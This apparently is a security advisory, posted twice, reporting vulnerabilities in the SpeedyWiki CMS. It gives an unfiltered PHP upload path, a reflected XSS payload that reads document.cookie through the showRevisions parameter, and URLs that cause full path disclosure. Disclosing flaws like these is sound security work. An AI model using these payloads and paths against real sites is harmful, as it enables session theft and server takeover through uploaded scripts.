a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
/index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</s
cript>
full path disclosure :
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
vendor site: http://speedywiki.sourceforge.net/
risk:critical
a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
/index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</s
cript>
full path disclosure :
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
[ reply ]